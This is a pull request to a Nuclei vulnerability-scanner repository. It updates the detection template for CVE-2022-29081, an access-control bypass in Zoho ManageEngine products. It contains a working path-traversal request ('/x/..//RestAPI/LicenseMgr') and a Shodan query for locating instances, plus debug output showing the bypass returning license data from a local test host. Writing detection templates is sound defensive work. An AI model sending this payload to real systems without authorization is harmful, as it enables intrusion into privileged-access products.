### PR TITLE
Added CVE-2022-29081 Template

### DIFF
--- a/http/cves/2022/CVE-2022-29081.yaml
+++ b/http/cves/2022/CVE-2022-29081.yaml
@@ -1,14 +1,15 @@
 id: CVE-2022-29081
+
 info:
   name: Zoho ManageEngine - Access Control Bypass
   author: 0xanis
   severity: critical
   description: |
-    Zoho ManageEngine Access Manager Plus before 4302, Password Manager Pro before 12007,
-    and PAM360 before 5401 are vulnerable to an authentication bypass vulnerability
-    in the REST API due to an improper URI check. An unauthenticated remote attacker
-    can exploit this by crafting a URL with a pattern like /x/../RestAPI/ to bypass
-    security checks on specific REST API URLs.
+    Zoho ManageEngine Access Manager Plus before 4302, Password Manager Pro before 12007, and PAM360 before 5401 are vulnerable to access-control bypass on a few Rest API URLs (for SSOutAction. SSLAction. LicenseMgr. GetProductDetails. GetDashboard. FetchEvents. and Synchronize) via the ../RestAPI substring.
+  impact: |
+    Attackers can bypass access controls on REST API endpoints, potentially leading to unauthorized data access or manipulation.
+  remediation: |
+    Update to the latest versions of Access Manager Plus, Password Manager Pro, and PAM360 that address this issue.
   reference:
     - https://www.tenable.com/security/research/tra-2022-14
     - https://www.manageengine.com/privileged-session-management/advisory/cve-2022-29081.html
@@ -18,17 +19,20 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2022-29081
     cwe-id: CWE-22
-  tags: cve,cve2022,zoho,manageengine,auth-bypass,kev
   metadata:
-    shodan-query: 'http.title:"manageengine"'
+    shodan-query: http.title:"manageengine"
+    verified: true
+    max-request: 1
+  tags: cve,cve2022,zoho,manageengine,auth-bypass,kev
 
 http:
-  - method: POST
-    path:
-      - "{{BaseURL}}/x/..//RestAPI/LicenseMgr"
-    body: "operation=getLicenseDetails"
-    headers:
-      Content-Type: application/x-www-form-urlencoded
+  - raw:
+      - |
+        POST /x/..//RestAPI/LicenseMgr HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        operation=getLicenseDetails
 
     matchers-condition: and
     matchers:


### PR DESCRIPTION
/claim #13982
### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2022-29081
- References:
    - https://www.tenable.com/security/research/tra-2022-14
    - https://www.manageengine.com/privileged-session-management/advisory/cve-2022-29081.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29081

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

- **Detection Flow**: A non-version-based detection flow relying on the actual access-control bypass via `/../RestAPI/` path smuggling.

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->
- Debug data 
```
  nuclei -t CVE-2022-29081.yaml -u https://localhost:9292 --debug
[ERR] GOOGLE_API_KEY env variable exists but GOOGLE_API_CX does not

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.5.1

                projectdiscovery.io

[INF] Current nuclei version: v3.5.1 (latest)
[INF] Current nuclei-templates version: v10.3.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 130
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2022-29081] Dumped HTTP request for https://localhost:9292/x/..//RestAPI/LicenseMgr

POST /x/..//RestAPI/LicenseMgr HTTP/1.1
Host: localhost:9292
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 27
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

operation=getLicenseDetails
[DBG] [CVE-2022-29081] Dumped HTTP response https://localhost:9292/x/..//RestAPI/LicenseMgr

HTTP/1.1 200
Connection: close
Content-Length: 244
Cache-Control: no-store
Content-Security-Policy: default-src  'self'; img-src 'self' data: https://www.manageengine.com; script-src 'unsafe-inline' 'unsafe-eval' 'self' resource:; style-src  'unsafe-inline' 'self'; frame-ancestors 'self' https://gram:9292; connect-src 'self' wss: https:; worker-src 'self' blob:; frame-src 'self' https://*.duosecurity.com   data:; font-src 'self' https://*.duosecurity.com
Content-Type: text/html;charset=UTF-8
Date: Wed, 19 Nov 2025 04:34:16 GMT
Pragma: no-cache
Server: AMP
Set-Cookie: JSESSIONID=B6CDA1FDA89A3791C5794CEDA818614D; Path=/; Secure; HttpOnly
Set-Cookie: pmpcc=6ca0e3ad-dffd-4be7-8a3d-d9f361b778da;path=/;SameSite=None;Secure;priority=high
Set-Cookie: _zcsr_tmp=6ca0e3ad-dffd-4be7-8a3d-d9f361b778da;path=/;SameSite=Strict;Secure;priority=high
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1

{"BUILD_NO":"4301","LICENSE_TO":"ManageEngine","COMPONENT_DETAILS":{"Days to Expire":"29days.","Number of Users":10},"VERSION":"4.3.0","LICENSE_TYPE":"Standard Edition - Trial Version","LICENSE_TYPE_CODE":"T","PRODUCT_NAME":"AccessManagerPlus"}
[CVE-2022-29081:word-1] [http] [critical] https://localhost:9292/x/..//RestAPI/LicenseMgr
[CVE-2022-29081:status-2] [http] [critical] https://localhost:9292/x/..//RestAPI/LicenseMgr
[INF] Scan completed in 110.996124ms. 2 matches found.
```


<img width="1204" height="468" alt="image" src="https://github.com/user-attachments/assets/f5e46835-3b8d-485a-8e7b-875648b50dc9" />


### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
